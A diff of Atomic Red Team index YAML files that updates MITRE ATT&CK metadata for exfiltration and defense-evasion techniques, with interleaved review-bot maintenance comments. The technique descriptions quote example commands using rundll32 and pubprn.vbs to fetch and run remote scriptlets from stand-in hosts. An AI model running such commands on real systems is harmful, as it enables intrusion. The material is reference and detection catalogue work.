@@ -61260,7 +62149,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -61280,7 +62168,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61302,8 +62190,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -61357,7 +62243,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -61382,7 +62267,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -61417,12 +62302,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61447,11 +62330,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
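Review bot: `x_mitre_network_requirements: false` is removed from T1020.001 (and from T1048 below) in the same hunk as the 1.2 to 1.3 version bump, which reads as an upstream field retirement rather than generator noise. Worth a quick grep of the index generator and any consumers for `x_mitre_network_requirements` so nothing still expects the key to be present.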
@@ -61494,9 +62376,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -61543,7 +62424,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -61569,7 +62449,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61602,13 +62482,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -61657,12 +62535,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -61698,12 +62575,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -61712,7 +62588,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61736,9 +62611,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61761,7 +62635,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61783,8 +62657,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61835,7 +62707,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61885,7 +62756,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61910,7 +62780,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61933,13 +62803,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61980,9 +62848,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -62030,7 +62897,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -62052,7 +62918,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -62076,12 +62942,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62145,6 +63009,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml
index ddb6094288..60a29d554c 100644
--- a/atomics/Indexes/iaas_gcp-index.yaml
+++ b/atomics/Indexes/iaas_gcp-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
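Review bot: the expanded T1027.011 description lists `/dev/shm`, `/run/shm`, `/var/run` and `/var/lock` as directories whose files are "mapped directly to RAM and not stored on the disk". That holds only when the directory is actually a tmpfs mount (the default for `/dev/shm` and `/run` on systemd-based distributions, with `/var/run` and `/var/lock` normally symlinks into `/run`), not by virtue of the path itself, so anyone building a detection from this index should key on the mount type rather than the path list alone. The text is mirrored from upstream ATT&CK, so there is nothing to fix in this repo, but the caveat belongs in the Linux atomic when one is written (the entry still has `atomic_tests: []`).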
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
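Review bot: two of the new reference keys for T1027.011 carry upstream typos: `Akami Frog4Shell 2024` (Akamai) and `Sysdig Fileless Malware 23022` (the year). They match the `(Citation: ...)` tokens used in the description earlier in the same object, so the cross-references resolve and they must not be hand-corrected here; a local fix would be reverted by the next regeneration and would break the citations in the meantime. Report them upstream to ATT&CK instead.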
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
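Review bot: this file is `iaas_gcp-index.yaml`, yet T1218.011 has `x_mitre_platforms: - Windows` only, and the same holds for T1055.011 (Extra Window Memory Injection) earlier in the file and T1556.003 (Linux/macOS) below, all with `atomic_tests: []`. Either the GCP index is meant to be a full enterprise matrix with non-GCP tests filtered out, or the platform filter in the generator is not applied to this file; the behaviour should be documented either way, because a consumer picking the GCP index to get GCP-relevant techniques currently gets Windows process-injection entries with no tests.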
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
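Review bot: the Poweliks reference URL changes to `https://www.stormshield.com/news/poweliks-command-line-confusion/` but the description still reads "Retrieved March 5, 2018". This is upstream ATT&CK reference data and should stay as generated, but a URL swap without a new retrieval date is the usual sign of a dead link being replaced without re-checking the content; anyone relying on this citation should confirm the new page still carries the Rundll32 JavaScript example the description depends on.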
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
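Review bot: the roughly 40 deleted lines in this hunk for T1556.003 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `created`, `external_references`, ...) are not removed from the object; they are re-emitted in a different key order in the next hunk, and the only real change here is the `modified` timestamp. This is the clearest example of key-order instability in the generated output: sorting keys in the generator would reduce this pair of hunks to a handful of lines and make the real changes reviewable.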
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
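Review bot: buried inside the reordering for T1556.003 is a real content change: `x_mitre_permissions_required: - root` is deleted and not re-added, while `revoked: false` and `x_mitre_deprecated: false` are new, `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0 and the technique version moves 2.0 to 2.1. The dropped root requirement is useful context for whoever writes the PAM atomic (editing `/etc/pam.d/` or replacing `pam_unix.so` needs root, as the description itself implies), so the PR description should call it out as an upstream field retirement instead of leaving it to be found in a moved-lines diff. The reference order also changed (`PAM Creds` now precedes `Red Hat PAM`), which is harmless but again points to a different serialization source.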
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
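Review bot: the retained context in this hunk shows the T1216.001 description with `script:`, the `pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct` example and `LDAP://` each broken onto their own line, with a stray `.` starting the next line, which is what you get when inline `<code>` markup is stripped and its line breaks kept. The same artefact appears in later hunks (`New-InboxRule` / `Set-InboxRule` under T1564.008, `HKLM\SYSTEM\CurrentControlSet\Services` under T1574.011, `/var/log/` under T1070.002). None of this is introduced by the change, but since these block scalars are regenerated on every run the fix belongs in the generator: unwrap the inline code spans before writing the `|-` block so the descriptions read as single sentences.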
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
